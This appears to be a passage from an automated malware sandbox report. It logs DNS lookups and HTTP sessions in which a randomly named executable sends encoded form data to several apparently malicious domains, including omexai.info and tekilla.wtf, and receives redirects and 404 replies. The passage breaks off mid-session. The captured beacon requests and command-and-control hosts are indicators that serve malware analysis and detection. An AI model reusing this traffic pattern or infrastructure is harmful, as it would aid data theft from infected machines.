Sep 22, 2024 17:35:12.572572947 CEST | 53 | 53541 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:35:17.583753109 CEST | 54706 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:35:18.184444904 CEST | 53 | 54706 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:35:33.802619934 CEST | 62032 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:35:33.930957079 CEST | 53 | 62032 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:35:47.200541019 CEST | 51829 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:35:47.958729982 CEST | 53 | 51829 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:36:01.131347895 CEST | 55952 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:36:01.507661104 CEST | 53 | 55952 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:36:15.069417953 CEST | 57863 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:36:15.131498098 CEST | 53 | 57863 | 1.1.1.1 | 192.168.2.7
Sep 22, 2024 17:36:28.428900003 CEST | 49263 | 53 | 192.168.2.7 | 1.1.1.1
Sep 22, 2024 17:36:28.641156912 CEST | 53 | 49263 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 22, 2024 17:35:06.965960026 CEST | 192.168.2.7 | 1.1.1.1 | 0x3b34 | Standard query (0) | www.woshop.online | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:35:12.521604061 CEST | 192.168.2.7 | 1.1.1.1 | 0x8528 | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:35:17.583753109 CEST | 192.168.2.7 | 1.1.1.1 | 0xf4d9 | Standard query (0) | www.elsupertodo.net | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:35:33.802619934 CEST | 192.168.2.7 | 1.1.1.1 | 0x9872 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:35:47.200541019 CEST | 192.168.2.7 | 1.1.1.1 | 0xc7ec | Standard query (0) | www.tekilla.wtf | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:36:01.131347895 CEST | 192.168.2.7 | 1.1.1.1 | 0x2206 | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:36:15.069417953 CEST | 192.168.2.7 | 1.1.1.1 | 0x39f0 | Standard query (0) | www.languagemodel.pro | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:36:28.428900003 CEST | 192.168.2.7 | 1.1.1.1 | 0xa834 | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Sep 22, 2024 17:35:07.514064074 CEST1.1.1.1192.168.2.70x3b34Name error (3)www.woshop.onlinenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:12.572572947 CEST1.1.1.1192.168.2.70x8528Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:18.184444904 CEST1.1.1.1192.168.2.70xf4d9No error (0)www.elsupertodo.net148.72.152.174A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)www.omexai.infoomexai.infoCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)omexai.info3.33.130.190A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:33.930957079 CEST1.1.1.1192.168.2.70x9872No error (0)omexai.info15.197.148.33A (IP address)IN (0x0001)false
              Sep 22, 2024 17:35:47.958729982 CEST1.1.1.1192.168.2.70xc7ecNo error (0)www.tekilla.wtfredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:35:47.958729982 CEST1.1.1.1192.168.2.70xc7ecNo error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:01.507661104 CEST1.1.1.1192.168.2.70x2206No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:36:01.507661104 CEST1.1.1.1192.168.2.70x2206No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:15.131498098 CEST1.1.1.1192.168.2.70x39f0No error (0)www.languagemodel.prowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
              Sep 22, 2024 17:36:15.131498098 CEST1.1.1.1192.168.2.70x39f0No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
              Sep 22, 2024 17:36:28.641156912 CEST1.1.1.1192.168.2.70xa834No error (0)www.kexweb.top63.250.47.40A (IP address)IN (0x0001)false
              • www.elsupertodo.net
              • www.omexai.info
              • www.tekilla.wtf
              • www.bola88site.one
              • www.languagemodel.pro
              • www.kexweb.top
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.7 | 49709 | 148.72.152.174 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:18.210988045 CEST | 566 | OUT | GET /2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.elsupertodo.net
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:18.760966063 CEST | 549 | IN | HTTP/1.1 301 Moved Permanently
              Server: nginx
              Date: Sun, 22 Sep 2024 15:35:18 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: close
              Location: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI
              X-XSS-Protection: 1; mode=block
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.7 | 49711 | 3.33.130.190 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:33.969995022 CEST | 822 | OUT | POST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d
              Data Ascii: H0QP6=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.7 | 49712 | 3.33.130.190 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:36.550641060 CEST | 842 | OUT | POST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 32 64 62 59 4d 79 4f 6c 75 74 32 54 66 39 75 64 4e 72 30 68 43 43 68 7a 78 36 59 77 4e 33 59 2b 61 46 4a 4f 70 34 74 55 36 64 2b 6d 50 45 67 46 38 3d
              Data Ascii: H0QP6=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612dbYMyOlut2Tf9udNr0hCChzx6YwN3Y+aFJOp4tU6d+mPEgF8=


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.7 | 49713 | 3.33.130.190 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:39.100012064 CEST | 1855 | OUT | POST /7xi5/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Origin: http://www.omexai.info
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.omexai.info/7xi5/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 56 74 79 6b 44 75 51 52 62 6b 30 50 30 71 59 35 77 7a 35 7a 4e 73 4c 2f 52 61 72 6d 31 42 42 61 77 5a 7a 59 6f 6d 75 50 50 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2f 2b 68 36 47 52 32 4b 6f 50 4a 38 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 32 57 39 [TRUNCATED]
              Data Ascii: H0QP6=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 [TRUNCATED]


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.7 | 49714 | 3.33.130.190 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:41.671920061 CEST | 562 | OUT | GET /7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:42.173580885 CEST | 412 | IN | HTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 22 Sep 2024 15:35:42 GMT
              Content-Type: text/html
              Content-Length: 272
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 51 50 36 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 41 78 72 63 42 54 7a 74 70 6a 71 42 72 5a 68 77 69 41 30 45 48 2f 6c 54 6f 71 7a 75 53 34 38 65 58 6d 5a 4a 48 42 78 30 6d 50 4e 4d 44 32 5a 62 31 4e 65 53 42 55 71 75 26 4f 58 56 78 39 3d 57 4e 6a 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT"}</script></head></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.7 | 49715 | 172.191.244.62 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:47.991040945 CEST | 822 | OUT | POST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 218
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 53 41 4e 59 46 36 45 70 4e 32 76 6c 6e 4d 55 6a 52 37 53 42 48 56 43 67 4d 67 6d 7a 30 34 31 55 75 62 55 6d 4f 58 4d 6c 75 2f 50 66 45 43 31 36 67 3d 3d
              Data Ascii: H0QP6=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaSANYF6EpN2vlnMUjR7SBHVCgMgmz041UubUmOXMlu/PfEC16g==
              Sep 22, 2024 17:35:48.515252113 CEST | 195 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:48 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              6 | 192.168.2.7 | 49716 | 172.191.244.62 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:50.544984102 CEST | 842 | OUT | POST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 238
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 74 35 6b 4f 45 51 6b 53 6c 41 57 76 66 4d 72 73 6a 74 36 5a 61 6c 53 57 6a 78 73 66 4b 52 68 67 74 45 58 57 46 44 2f 4e 58 50 56 4b 38 56 69 4d 77 3d
              Data Ascii: H0QP6=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWt5kOEQkSlAWvfMrsjt6ZalSWjxsfKRhgtEXWFD/NXPVK8ViMw=
              Sep 22, 2024 17:35:50.996587992 CEST | 195 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:50 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              7 | 192.168.2.7 | 49717 | 172.191.244.62 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:53.095289946 CEST | 1855 | OUT | POST /fpzw/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Origin: http://www.tekilla.wtf
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1250
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.tekilla.wtf/fpzw/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 48 30 51 50 36 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 71 6b 38 33 6b 79 67 67 58 79 64 41 35 6b 76 50 38 42 72 68 78 52 53 2b 7a 50 74 73 37 61 38 2b 47 74 53 47 62 72 67 6f 47 63 77 68 74 45 49 79 4a 76 34 4a 44 41 50 34 73 56 32 6f 53 37 47 68 61 59 68 77 34 61 44 53 4f 53 6f 44 4f 44 57 34 36 73 31 49 30 6d 52 4d 53 35 33 63 6a 69 33 63 67 62 46 34 57 43 36 69 67 4b 58 4c 59 76 4f 65 4f 30 56 59 58 75 36 30 53 75 57 67 2b 67 48 68 43 4f 2b 77 34 31 41 45 2b 2f 30 4a 64 6b 6d 75 7a 48 6e 67 31 57 69 74 7a 63 72 39 72 51 2f 7a 59 56 [TRUNCATED]
              Data Ascii: H0QP6=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 [TRUNCATED]
              Sep 22, 2024 17:35:53.574250937 CEST | 195 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:53 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              8 | 192.168.2.7 | 49718 | 172.191.244.62 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:35:55.642049074 CEST | 562 | OUT | GET /fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.tekilla.wtf
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:35:56.119117975 CEST | 195 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/plain; charset=utf-8
              X-Content-Type-Options: nosniff
              Date: Sun, 22 Sep 2024 15:35:56 GMT
              Content-Length: 19
              Connection: close
              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
              Data Ascii: 404 page not found


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              9 | 192.168.2.7 | 49719 | 172.96.191.39 | 80 | 5424 | C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 22, 2024 17:36:01.526561975 CEST | 831 | OUT | POST /3qit/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.bola88site.one
